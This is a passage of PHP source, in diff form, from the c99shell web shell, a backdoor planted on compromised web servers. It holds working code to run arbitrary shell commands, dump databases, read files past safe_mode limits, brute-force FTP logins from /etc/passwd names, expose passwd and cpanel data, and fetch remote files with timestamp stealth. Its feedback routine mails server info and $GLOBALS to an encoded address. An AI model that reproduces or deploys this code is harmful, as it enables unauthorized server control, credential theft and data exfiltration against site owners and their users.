    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if 